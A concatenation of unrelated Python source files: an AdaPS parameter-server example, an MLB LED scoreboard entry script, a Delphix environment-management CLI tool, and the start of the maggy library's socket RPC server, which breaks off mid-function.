kv.push(keys2, pushvals)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after push")
# set
kv.set(keys2, setvals)
# asynchronous operations
kv.push(keys2, pushvals, True)
kv.pull(keys2, pushvals, True)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after set")
# asynchronous operations
ts1 = kv.push(keys2, pushvals, True)
ts2 = kv.pull(keys2, vals, True)
kv.wait(ts1) # optional
kv.wait(ts2) # optional
## pull the key that holds a vector of other length
longer_key = np.array([400])
longer_vals = np.ones((10), dtype=np.float32)
kv.pull(longer_key, longer_vals)
## sampling
N = 8
s1 = kv.prepare_sample(N, kv.current_clock())
samplekeys = np.zeros(N, dtype=np.int64)
samplevals = np.ones((len(samplekeys)*vpk), dtype=np.float32)
kv.pull_sample(s1, samplekeys, samplevals)
print("sampled keys in w" + str(worker_id) + ": " + str(samplekeys))
except Exception as e:
print(e)
os._exit(1)
def worker_torch(worker_id, rank, kv):
"""Example worker, using PyTorch tensors """
print("run worker " + str(worker_id) + " on server rank " + str(rank) + ", using PyTorch tensors")
try:
np.random.seed(worker_id)
torch.manual_seed(worker_id)
keys = torch.LongTensor([1,2,3,4])
keys2 = torch.LongTensor([1,333,666,960])+worker_id
vals = torch.ones((len(keys)*vpk), dtype=torch.float32)
pushvals = torch.from_numpy(np.random.rand(len(keys2)*vpk).astype(np.float32))
setvals = torch.ones((len(keys)*vpk), dtype=torch.float32)
# pull
kv.pull(keys, vals)
print("worker " + str(worker_id) + " pulled " + str(vals))
# localize
kv.intent(keys2, kv.current_clock()+1)
kv.advance_clock()
kv.wait_sync()
# push
print("worker " + str(worker_id) + " pushes " + str(pushvals))
kv.push(keys2, pushvals)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after push")
# set
kv.set(keys2, setvals)
# pull to check values
kv.pull(keys2, vals)
print("worker " + str(worker_id) + " pulled " + str(vals) + " after set")
# asynchronous operations
ts1 = kv.push(keys2, pushvals, True)
ts2 = kv.pull(keys2, vals, True)
kv.wait(ts1) # optional
kv.wait(ts2) # optional
## pull the key that holds a vector of other length
longer_key = torch.LongTensor([400])
longer_vals = torch.ones((10), dtype=torch.float32)
kv.pull(longer_key, longer_vals)
except Exception as e:
print(e)
os._exit(1)
def init_scheduler(dummy, num_nodes):
os.environ['DMLC_NUM_SERVER'] = str(num_nodes)
os.environ['DMLC_ROLE'] = 'scheduler'
os.environ['DMLC_PS_ROOT_URI'] = localip
os.environ['DMLC_PS_ROOT_PORT'] = port
adaps.scheduler(num_keys, num_workers_per_node)
def init_node(rank, num_nodes):
"""Start up an AdaPS node (server + multiple worker threads)"""
os.environ['DMLC_NUM_SERVER'] = str(num_nodes)
os.environ['DMLC_ROLE'] = 'server'
os.environ['DMLC_PS_ROOT_URI'] = localip
os.environ['DMLC_PS_ROOT_PORT'] = port
adaps.setup(num_keys, num_workers_per_node)
# in this example, there are `num_keys` keys and all keys except one
# hold a vector of length `vpk`. To indicate this to AdaPS, we pass
# an array of length `num_keys`, in which each key holds the length
# of the parameter vector
value_lengths = torch.ones(num_keys)*vpk
value_lengths[400] = 10 ## one key holds a vector of other length
s = adaps.Server(value_lengths)
s.enable_sampling_support(scheme="local", with_replacement=True,
distribution="uniform", min=0, max=int(num_keys/2))
threads = []
for w in range(num_workers_per_node):
worker_id = rank * num_workers_per_node + w
t = threading.Thread(target=run_worker, args=(worker_id, rank, adaps.Worker(w, s)))
t.start()
threads.append(t)
for t in threads:
t.join()
# shutdown AdaPS node
s.shutdown()
def kill_processes(signal_received, frame):
"""Kills all started AdaPS processes"""
print('\nSIGINT or CTRL-C detected. Shutting down all processes and exiting..')
for p in processes:
p.kill()
exit(0)
processes = []
if __name__ == "__main__":
# catch interrupt (to shut down AdaPS processes)
signal(SIGINT, kill_processes)
# launch AdaPS scheduler
p = Process(target=init_scheduler, args=(0, num_nodes))
p.start()
processes.append(p)
# launch AdaPS processes
for rank in range(num_nodes):
p = Process(target=init_node, args=(rank, num_nodes))
p.start()
processes.append(p)
for p in processes:
p.join()
|
main.py
|
import sys
if sys.version_info <= (3, 5):
print("Error: Please run with python3")
sys.exit(1)
import logging
import os
import threading
import time
from PIL import Image
import debug
from data import Data
from data.config import Config
from renderers.main import MainRenderer
from utils import args, led_matrix_options
from version import SCRIPT_NAME, SCRIPT_VERSION
try:
from rgbmatrix import RGBMatrix, __version__
emulated = False
except ImportError:
from RGBMatrixEmulator import RGBMatrix, version
emulated = True
def main(matrix, config_base):
# Read scoreboard options from config.json if it exists
config = Config(config_base, matrix.width, matrix.height)
logger = logging.getLogger("mlbled")
if config.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.WARNING)
# Print some basic info on startup
debug.info("%s - v%s (%sx%s)", SCRIPT_NAME, SCRIPT_VERSION, matrix.width, matrix.height)
if emulated:
debug.log("rgbmatrix not installed, falling back to emulator!")
debug.log("Using RGBMatrixEmulator version %s", version.__version__)
else:
debug.log("Using rgbmatrix version %s", __version__)
# Draw startup screen
logo = "assets/mlb-w" + str(matrix.width) + "h" + str(matrix.height) + ".png"
# MLB image disabled when using renderer, for now.
# see: https://github.com/ty-porter/RGBMatrixEmulator/issues/9#issuecomment-922869679
if os.path.exists(logo) and not emulated:
logo = Image.open(logo)
matrix.SetImage(logo.convert("RGB"))
logo.close()
# Create a new data object to manage the MLB data
# This will fetch initial data from MLB
data = Data(config)
# create render thread
render = threading.Thread(target=__render_main, args=[matrix, data], name="render_thread", daemon=True)
time.sleep(1)
render.start()
screen = data.get_screen_type()
if screen == "news":
__refresh_offday(render, data)
elif screen == "standings":
__refresh_standings(render, data)
else:
__refresh_games(render, data)
def __refresh_offday(render_thread, data): # type: (threading.Thread, Data) -> None
debug.log("Main has selected the offday information to refresh")
while render_thread.is_alive():
time.sleep(30)
data.refresh_weather()
data.refresh_news_ticker()
def __refresh_standings(render_thread, data): # type: (threading.Thread, Data) -> None
if data.standings.populated():
debug.log("Main has selected the standings to refresh")
while render_thread.is_alive():
time.sleep(30)
data.refresh_standings()
else:
__refresh_offday(render_thread, data)
def __refresh_games(render_thread, data): # type: (threading.Thread, Data) -> None
debug.log("Main has selected the game and schedule information to refresh")
starttime = time.time()
promise_game = data.schedule.games_live()
while render_thread.is_alive():
time.sleep(0.5)
data.refresh_schedule()
if data.config.standings_no_games:
if not data.schedule.games_live():
data.refresh_standings()
continue
# make sure a game is poulated
elif not promise_game:
promise_game = True
data.advance_to_next_game()
rotate = data.should_rotate_to_next_game()
if data.schedule.games_live() and not rotate:
data.refresh_game()
endtime = time.time()
time_delta = endtime - starttime
rotate_rate = data.config.rotate_rate_for_status(data.current_game.status())
if time_delta >= rotate_rate and data.scrolling_finished:
starttime = time.time()
if rotate:
data.advance_to_next_game()
def __render_main(matrix, data):
MainRenderer(matrix, data).render()
if __name__ == "__main__":
# Check for led configuration arguments
command_line_args = args()
matrixOptions = led_matrix_options(command_line_args)
# Initialize the matrix
matrix = RGBMatrix(options=matrixOptions)
try:
config, _ = os.path.splitext(command_line_args.config)
main(matrix, config)
except:
debug.exception("Untrapped error in main!")
sys.exit(1)
finally:
matrix.Clear()
|
dx_environment.py
|
#!/usr/bin/env python
#Corey Brune 08 2016
#This script creates an environment
#requirements
#pip install docopt delphixpy
#The below doc follows the POSIX compliant standards and allows us to use
#this doc to also define our arguments for the script.
"""Create Host Environment
Usage:
dx_environment.py (--type <name> --env_name <name> --host_user <username> \
--ip <address> [--toolkit <path_to_the_toolkit>] [--ase --ase_user <name> --ase_pw <name>] \
|--update_ase_pw <name> --env_name <name> | --update_ase_user <name> --env_name <name> \
| --delete <env_name> | --refresh <env_name> | --list)
[--logdir <directory>][--debug] [--config <filename>] [--connector_name <name>]
[--pw <password>][--engine <identifier>][--all] [--poll <n>]
dx_environment.py (--update_host --old_host_address <name> --new_host_address <name>) [--logdir <directory>][--debug] [--config <filename>]
dx_environment.py ([--enable]|[--disable]) --env_name <name> [--logdir <directory>][--debug] [--config <filename>]
dx_environment.py -h | --help | -v | --version
Create a Delphix environment. (current support for standalone environments only)
Examples:
dx_environment.py --engine landsharkengine --type linux --env_name test1 --host_user delphix --pw delphix --ip 182.1.1.1 --toolkit /var/opt/delphix
dx_environment.py --type linux --env_name test1 --update_ase_pw newPasswd
dx_environment.py --type linux --env_name test1 --host_user delphix --pw delphix --ip 182.1.1.1 --toolkit /var/opt/delphix
dx_environment.py --update_host --host_name 10.0.3.60
dx_environment.py --type linux --env_name test1 --host_user delphix --pw delphix --ip 182.1.1.1 --toolkit /var/opt/delphix --ase --ase_user sa --ase_pw delphixpw
dx_environment.py --type windows --env_name SOURCE --host_user delphix.local\\administrator --ip 10.0.1.50 --toolkit foo --config dxtools.conf --pw 'myTempPassword123!' --debug --connector_name 10.0.1.60
dx_environment.py --enable --env_name SOURCE
dx_environment.py --disable --env_name SOURCE
dx_environment.py --list
Options:
--type <name> The OS type for the environment
--env_name <name> The name of the Delphix environment
--ip <addr> The IP address of the Delphix environment
--list List all of the environments for a given engine
--toolkit <path> Path of the toolkit. Required for Unix/Linux
--host_user <username> The username on the Delphix environment
--delete <environment> The name of the Delphix environment to delete
--update_ase_pw <name> The new ASE DB password
--refresh <environment> The name of the Delphix environment to refresh. Specify "all" to refresh all environments
--pw <password> Password of the user
--connector_name <environment> The name of the Delphix connector to use. Required for Windows source environments
--update_ase_user <name> Update the ASE DB username
--ase Flag to enable ASE environments
--ase_user <name> The ASE DB username
--ase_pw <name> Password of the ASE DB user
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--engine <type> Identifier of Delphix engine in dxtools.conf.
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_environment.log]
-h --help Show this screen.
-v --version Show version.
--update_host Update the host address for an environment
--old_host_address <name> The current name of the host, as registered in Delphix. Required for update_host
--new_host_address <name> The desired name of the host, as registered in Delphix. Required for update_host
--enable Enable the named environment
--disable Disable the named environment
"""
VERSION="v.0.3.612"
from docopt import docopt
from os.path import basename
import sys
import traceback
from time import sleep, time
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import host
from delphixpy.v1_8_0.web.vo import UnixHostEnvironment
from delphixpy.v1_8_0.web.vo import ASEHostEnvironmentParameters
from delphixpy.v1_8_0.web.vo import HostEnvironmentCreateParameters
from delphixpy.v1_8_0.web.vo import WindowsHostEnvironment
from delphixpy.v1_8_0.web.vo import WindowsHost
from delphixpy.v1_8_0.web.vo import UnixHost
from lib.DlpxException import DlpxException
from lib.GetSession import GetSession
from lib.GetReferences import find_obj_by_name
from lib.GetReferences import find_obj_name
from lib.GetReferences import find_all_objects
from lib.DxLogging import logging_est
from lib.DxLogging import print_info
from lib.DxLogging import print_debug
from lib.DxLogging import print_exception
def enable_environment(dlpx_obj, env_name):
"""
Enable the given host
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = find_obj_by_name(dlpx_obj.server_session,
environment, env_name)
try:
environment.enable(dlpx_obj.server_session,env_obj.reference)
print('Attempting to enable {}'.format(env_name))
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Enabling the host {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
def disable_environment(dlpx_obj,env_name):
"""
Enable the given host
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = find_obj_by_name(dlpx_obj.server_session,
environment, env_name)
try:
environment.disable(dlpx_obj.server_session,env_obj.reference)
print('Attempting to disable {}'.format(env_name))
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Disabling the host {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
def update_host_address(dlpx_obj, old_host_address, new_host_address):
"""
Update the given host
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
old_host_obj = find_obj_by_name(dlpx_obj.server_session,
host, old_host_address)
if old_host_obj.type == "WindowsHost":
host_obj = WindowsHost()
else:
host_obj = UnixHost()
host_obj.address = new_host_address
try:
host.update(dlpx_obj.server_session, old_host_obj.reference, host_obj)
print('Attempting to update {} to {}'.format(old_host_address, new_host_address))
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Updating the host {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
def list_env(dlpx_obj):
"""
List all environments for a given engine
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
all_envs = environment.get_all(dlpx_obj.server_session)
for env in all_envs:
env_user = find_obj_name(dlpx_obj.server_session,
environment.user, env.primary_user)
try:
env_host = find_obj_name(dlpx_obj.server_session, host, env.host)
except AttributeError:
pass
if env.type == 'WindowsHostEnvironment':
print('Environment Name: {}, Username: {}, Host: {},'
'Enabled: {}, '.format(env.name, env_user, env_host,
env.enabled))
elif env.type == 'WindowsCluster' or env.type == 'OracleCluster':
print('Environment Name: {}, Username: {}' \
'Enabled: {}, '.format(env.name, env_user, env.enabled))
else:
print 'Environment Name: {}, Username: {}, Host: {}, Enabled: {},'\
' ASE Environment Params: {}'.format(
env.name, env_user, env_host, env.enabled,
env.ase_host_environment_parameters if
isinstance(env.ase_host_environment_parameters,
ASEHostEnvironmentParameters) else 'Undefined')
def delete_env(dlpx_obj, env_name):
"""
Deletes an environment
engine: Dictionary of engines
env_name: Name of the environment to delete
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = find_obj_by_name(dlpx_obj.server_session, environment,
env_name)
if env_obj:
environment.delete(dlpx_obj.server_session, env_obj.reference)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
elif env_obj is None:
print('Environment was not found in the Engine: {}'.format(env_name))
sys.exit(1)
def refresh_env(dlpx_obj, env_name):
"""
Refresh the environment
engine: Dictionary of engines
env_name: Name of the environment to refresh
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
if env_name == "all":
env_list = find_all_objects(dlpx_obj.server_session, environment)
for env_obj in env_list:
try:
environment.refresh(dlpx_obj.server_session, env_obj.reference)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Refreshing the environment {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
else:
try:
env_obj = find_obj_by_name(dlpx_obj.server_session, environment,
env_name)
environment.refresh(dlpx_obj.server_session, env_obj.reference)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError) as e:
print_exception('\nERROR: Refreshing the environment {} '
'encountered an error:\n{}'.format(env_name, e))
sys.exit(1)
def update_ase_username(dlpx_obj):
"""
Update the ASE database user password
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = UnixHostEnvironment()
env_obj.ase_host_environment_parameters = ASEHostEnvironmentParameters()
env_obj.ase_host_environment_parameters.db_user = \
arguments['--update_ase_user']
try:
environment.update(dlpx_obj.server_session, find_obj_by_name(
dlpx_obj.server_session, environment, arguments['--env_name'],
env_obj).reference, env_obj)
except (HttpError, RequestError) as e:
print_exception('\nERROR: Updating the ASE DB password '
'failed:\n{}\n'.format(e))
def update_ase_pw(dlpx_obj):
"""
Update the ASE database user password
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_obj = UnixHostEnvironment()
env_obj.ase_host_environment_parameters = ASEHostEnvironmentParameters()
env_obj.ase_host_environment_parameters.credentials = {'type':
'PasswordCredential',
'password':
arguments['--update_ase_pw']}
try:
environment.update(dlpx_obj.server_session, find_obj_by_name(
dlpx_obj.server_session, environment, arguments['--env_name'],
env_obj).reference, env_obj)
except (HttpError, RequestError) as e:
print_exception('\nERROR: Updating the ASE DB password '
'failed:\n{}\n'.format(e))
def create_linux_env(dlpx_obj, env_name, host_user, ip_addr, toolkit_path,
pw=None):
"""
Create a Linux environment.
env_name: The name of the environment
host_user: The server account used to authenticate
ip_addr: DNS name or IP address of the environment
toolkit_path: Path to the toolkit. Note: This directory must be
writable by the host_user
pw: Password of the user. Default: None (use SSH keys instead)
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_params_obj = HostEnvironmentCreateParameters()
if pw is None:
print_debug('Creating the environment with SSH Keys')
env_params_obj.primary_user = {'type': 'EnvironmentUser',
'name': host_user,
'credential': {
'type': 'SystemKeyCredential'}}
else:
print_debug('Creating the environment with a password')
env_params_obj.primary_user = {'type': 'EnvironmentUser',
'name': host_user,
'credential': {
'type': 'PasswordCredential',
'password': pw }}
env_params_obj.host_parameters = {'type': 'UnixHostCreateParameters',
'host': { 'address': ip_addr,
'type': 'UnixHost',
'name': env_name,
'toolkitPath': toolkit_path}}
env_params_obj.host_environment = UnixHostEnvironment()
env_params_obj.host_environment.name = env_name
if arguments['--ase']:
env_params_obj.host_environment.ase_host_environment_parameters = \
ASEHostEnvironmentParameters()
try:
env_params_obj.host_environment.ase_host_environment_parameters.db_user = \
arguments['--ase_user']
env_params_obj.host_environment.ase_host_environment_parameters.credentials = {
'type': 'PasswordCredential',
'password': arguments['--ase_pw']}
except KeyError:
print_exception('The --ase_user and --ase_pw arguments are'
' required with the --ase flag.\n')
try:
environment.create(dlpx_obj.server_session,
env_params_obj)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError, HttpError) as e:
print('\nERROR: Encountered an exception while creating the '
'environment:\n{}'.format(e))
except JobError as e:
print_exception('JobError while creating environment {}:\n{}'.format(
e, e.message))
def create_windows_env(dlpx_obj, env_name, host_user, ip_addr,
pw=None, connector_name=None):
"""
Create a Windows environment.
env_name: The name of the environment
host_user: The server account used to authenticate
ip_addr: DNS name or IP address of the environment
toolkit_path: Path to the toolkit. Note: This directory must be
writable by the host_user
pw: Password of the user. Default: None (use SSH keys instead)
"""
engine_name = dlpx_obj.dlpx_engines.keys()[0]
env_params_obj = HostEnvironmentCreateParameters()
print_debug('Creating the environment with a password')
env_params_obj.primary_user = {'type': 'EnvironmentUser',
'name': host_user,
'credential': {
'type': 'PasswordCredential',
'password': pw }}
env_params_obj.host_parameters = {'type': 'WindowsHostCreateParameters',
'host': { 'address': ip_addr,
'type': 'WindowsHost',
'name': env_name,
'connectorPort': 9100}}
env_params_obj.host_environment = WindowsHostEnvironment()
env_params_obj.host_environment.name = env_name
if connector_name:
env_obj = find_obj_by_name(dlpx_obj.server_session, environment,
connector_name)
if env_obj:
env_params_obj.host_environment.proxy = env_obj.host
elif env_obj is None:
print('Host was not found in the Engine: {}'.format(arguments[--connector_name]))
sys.exit(1)
try:
environment.create(dlpx_obj.server_session,
env_params_obj)
dlpx_obj.jobs[engine_name] = \
dlpx_obj.server_session.last_job
except (DlpxException, RequestError, HttpError) as e:
print('\nERROR: Encountered an exception while creating the '
'environment:\n{}'.format(e))
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine, dlpx_obj):
"""
This function is where we create our main workflow.
Use the @run_async decorator to run this function asynchronously.
The @run_async decorator allows us to run against multiple Delphix Engine
simultaneously
:param engine: Dictionary of engines
:type engine: dictionary
:param dlpx_obj: Virtualization Engine session object
:type dlpx_obj: lib.GetSession.GetSession
"""
try:
# Setup the connection to the Delphix Engine
dlpx_obj.serversess(engine['ip_address'], engine['username'],
engine['password'])
except DlpxException as e:
print_exception('ERROR: Engine {} encountered an error while'
'{}:\n{}\n'.format(engine['hostname'],
arguments['--target'], e))
sys.exit(1)
thingstodo = ["thingtodo"]
try:
with dlpx_obj.job_mode(single_thread):
while len(dlpx_obj.jobs) > 0 or len(thingstodo) > 0:
if len(thingstodo)> 0:
if arguments['--type'] == 'linux' or arguments['--type'] == 'windows':
env_name = arguments['--env_name']
host_user = arguments['--host_user']
pw = arguments['--pw']
ip_addr = arguments['--ip']
host_name = arguments['--connector_name']
if arguments['--type'] == 'linux':
toolkit_path = arguments['--toolkit']
create_linux_env(dlpx_obj, env_name, host_user,
ip_addr, toolkit_path, pw)
else:
create_windows_env(dlpx_obj, env_name, host_user,
ip_addr, pw, host_name,)
elif arguments['--delete']:
delete_env(dlpx_obj, arguments['--delete'])
elif arguments['--refresh']:
refresh_env(dlpx_obj, arguments['--refresh'])
elif arguments['--update_ase_pw']:
update_ase_pw(dlpx_obj)
elif arguments['--update_ase_user']:
update_ase_username(dlpx_obj)
elif arguments['--list']:
list_env(dlpx_obj)
elif arguments['--update_host']:
update_host_address(dlpx_obj, arguments['--old_host_address'], arguments['--new_host_address'])
elif arguments['--enable']:
enable_environment(dlpx_obj, arguments['--env_name'])
elif arguments['--disable']:
disable_environment(dlpx_obj, arguments['--env_name'])
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in dlpx_obj.jobs.keys():
job_obj = job.get(dlpx_obj.server_session, dlpx_obj.jobs[j])
print_debug(job_obj)
print_info('{} Environment: {}'.format(
engine['hostname'], job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it
# from the running jobs list.
del dlpx_obj.jobs[j]
elif job_obj.job_state in 'RUNNING':
# If the job is in a running state, increment the
# running job count.
i += 1
print_info('{}: {:d} jobs running.'.format(
engine['hostname'], i))
# If we have running jobs, pause before repeating the
# checks.
if len(dlpx_obj.jobs) > 0:
sleep(float(arguments['--poll']))
except (DlpxException, RequestError, JobError, HttpError) as e:
print_exception('Error while creating the environment {}\n{}'.format(
arguments['--env_name'], e))
sys.exit(1)
def run_job(dlpx_obj, config_file_path):
"""
This function runs the main_workflow aynchronously against all the
servers specified
dlpx_obj: Virtualization Engine session object
config_file_path: filename of the configuration file for virtualization
engines
"""
#Create an empty list to store threads we create.
threads = []
engine = None
#If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
#For each server in the dxtools.conf...
for delphix_engine in dlpx_obj.dlpx_engines:
engine = dlpx_obj.dlpx_engines[delphix_engine]
#Create a new thread and add it to the list.
threads.append(main_workflow(engine, dlpx_obj))
except DlpxException as e:
print 'Error encountered in run_job():\n{}'.format(e)
sys.exit(1)
elif arguments['--all'] is False:
#Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dlpx_obj.dlpx_engines[arguments['--engine']]
print_info('Executing against Delphix Engine: {}\n'.format(
arguments['--engine']))
except (DlpxException, RequestError, KeyError) as e:
print_exception('\nERROR: Delphix Engine {} cannot be '
'found in {}. Please check your value '
'and try again. Exiting.\n'.format(
arguments['--engine'], config_file_path))
else:
#Else search for a default engine in the dxtools.conf
for delphix_engine in dlpx_obj.dlpx_engines:
if dlpx_obj.dlpx_engines[delphix_engine]['default'] == \
'true':
engine = dlpx_obj.dlpx_engines[delphix_engine]
print_info('Executing against the default Delphix Engine '
'in the dxtools.conf: {}'.format(
dlpx_obj.dlpx_engines[delphix_engine]['hostname']))
break
if engine is None:
raise DlpxException("\nERROR: No default engine found. Exiting")
#run the job against the engine
threads.append(main_workflow(engine, dlpx_obj))
#For each thread in the list...
for each in threads:
#join them back together so that we wait for all threads to complete
# before moving on
each.join()
def time_elapsed(time_start):
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
:param time_start: start time of the script.
:type time_start: float
"""
return round((time() - time_start)/60, +1)
def main():
# We want to be able to call on these variables anywhere in the script.
global single_thread
global debug
time_start = time()
single_thread = False
try:
dx_session_obj = GetSession()
logging_est(arguments['--logdir'])
print_debug(arguments)
config_file_path = arguments['--config']
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
# This is the function that will handle processing main_workflow for
# all the servers.
run_job(dx_session_obj, config_file_path)
elapsed_minutes = time_elapsed(time_start)
print_info('script took {:.2f} minutes to get this far.'.format(
elapsed_minutes))
# Here we handle what we do when the unexpected happens
except SystemExit as e:
# This is what we use to handle our sys.exit(#)
sys.exit(e)
except DlpxException as e:
# We use this exception handler when an error occurs in a function call.
print_exception('ERROR: Please check the ERROR message below:\n'
'{}'.format(e.message))
sys.exit(2)
except HttpError as e:
# We use this exception handler when our connection to Delphix fails
print_exception('ERROR: Connection failed to the Delphix Engine. Please'
'check the ERROR message below:\n{}'.format(e.message))
sys.exit(2)
except JobError as e:
# We use this exception handler when a job fails in Delphix so that we
# have actionable data
print_exception('A job failed in the Delphix Engine:\n{}'.format(e.job))
elapsed_minutes = time_elapsed(time_start)
print_exception('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
sys.exit(3)
except KeyboardInterrupt:
# We use this exception handler to gracefully handle ctrl+c exits
print_debug('You sent a CTRL+C to interrupt the process')
elapsed_minutes = time_elapsed(time_start)
print_info('{} took {:.2f} minutes to get this far'.format(
basename(__file__), elapsed_minutes))
except:
# Everything else gets caught here
print_exception('{}\n{}'.format(sys.exc_info()[0],
traceback.format_exc()))
elapsed_minutes = time_elapsed(time_start)
print_info("{} took {:.2f} minutes to get this far".format(
basename(__file__), elapsed_minutes))
sys.exit(1)
if __name__ == "__main__":
#Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
#Feed our arguments to the main function, and off we go!
main()
|
rpc.py
|
#
# Copyright 2021 Logical Clocks AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
import secrets
import select
import socket
import struct
import threading
import time
import typing
from typing import Any
from pyspark import cloudpickle
from maggy.core.environment.singleton import EnvSing
from maggy.trial import Trial
if typing.TYPE_CHECKING: # Avoid circular import error.
from maggy.core.experiment_driver.driver import Driver
MAX_RETRIES = 3
BUFSIZE = 1024 * 2
SERVER_HOST_PORT = None
class Reservations(object):
"""Thread-safe store for worker reservations.
Needs to be thread-safe mainly because the server listener thread can add
reservations while the experiment driver might modify something on a
reservation.
"""
def __init__(self, required):
"""
Args:
required:
"""
self.required = required
self.lock = threading.RLock()
self.reservations = {}
self.check_done = False
def add(self, meta):
"""
Add a reservation.
Args:
:meta: a dictonary of metadata about a node
"""
with self.lock:
self.reservations[meta["partition_id"]] = {
"host_port": meta["host_port"],
"task_attempt": meta["task_attempt"],
"trial_id": meta["trial_id"],
"num_executors": self.required,
}
if self.remaining() == 0:
self.check_done = True
def done(self):
"""Returns True if the ``required`` number of reservations have been fulfilled."""
with self.lock:
return self.check_done
def get(self):
"""Get the current reservations."""
with self.lock:
return self.reservations
def remaining(self):
"""Get a count of remaining/unfulfilled reservations."""
with self.lock:
num_registered = len(self.reservations)
return self.required - num_registered
def get_assigned_trial(self, partition_id):
"""Get the ``trial_id`` of the trial assigned to ``partition_id``.
Returns None if executor with ``partition_id`` is not registered or if
``partition_id`` is not assigned a trial yet.
Args:
:partition_id: An id to identify the spark executor.
Returns:
trial_id
"""
with self.lock:
reservation = self.reservations.get(partition_id, None)
if reservation is not None:
return reservation.get("trial_id", None)
def assign_trial(self, partition_id, trial_id):
"""Assigns trial with ``trial_id`` to the reservation with ``partition_id``.
Args:
partition_id --
trial {[type]} -- [description]
"""
with self.lock:
self.reservations.get(partition_id, None)["trial_id"] = trial_id
class MessageSocket(object):
"""Abstract class w/ length-prefixed socket send/receive functions."""
def receive(self, sock):
"""
Receive a message on ``sock``
Args:
sock:
Returns:
"""
msg = None
data = b""
recv_done = False
recv_len = -1
while not recv_done:
buf = sock.recv(BUFSIZE)
if buf is None or len(buf) == 0:
raise Exception("socket closed")
if recv_len == -1:
recv_len = struct.unpack(">I", buf[:4])[0]
data += buf[4:]
recv_len -= len(data)
else:
data += buf
recv_len -= len(buf)
recv_done = recv_len == 0
msg = cloudpickle.loads(data)
return msg
def send(self, sock, msg):
"""
Send ``msg`` to destination ``sock``.
Args:
sock:
msg:
Returns:
"""
data = cloudpickle.dumps(msg)
buf = struct.pack(">I", len(data)) + data
sock.sendall(buf)
class Server(MessageSocket):
"""Simple socket server with length prefixed pickle messages"""
reservations = None
done = False
def __init__(self, num_executors):
"""
Args:
num_executors:
"""
if not num_executors > 0:
raise ValueError("Number of executors has to be greater than zero!")
self.reservations = Reservations(num_executors)
self.callback_list = []
self.message_callbacks = self._register_callbacks()
def await_reservations(self, sc, status={}, timeout=600):
"""
Block until all reservations are received.
Args:
sc:
status:
timeout:
Returns:
"""
timespent = 0
while not self.reservations.done():
print("Waiting for {} reservations.".format(self.reservations.remaining()))
# check status flags for any errors
if "error" in status:
sc.cancelAllJobs()
time.sleep(1)
timespent += 1
if timespent > timeout:
raise Exception("Timed out waiting for reservations to complete")
print("All reservations completed.")
return self.reservations.get()
def _handle_message(self, sock, msg, exp_driver):
"""
Handles a message dictionary. Expects a 'type' and 'data' attribute in
the message dictionary.
Args:
sock:
msg:
Returns:
"""
msg_type = msg["type"]
resp = {}
try:
self.message_callbacks[msg_type](
resp, msg, exp_driver
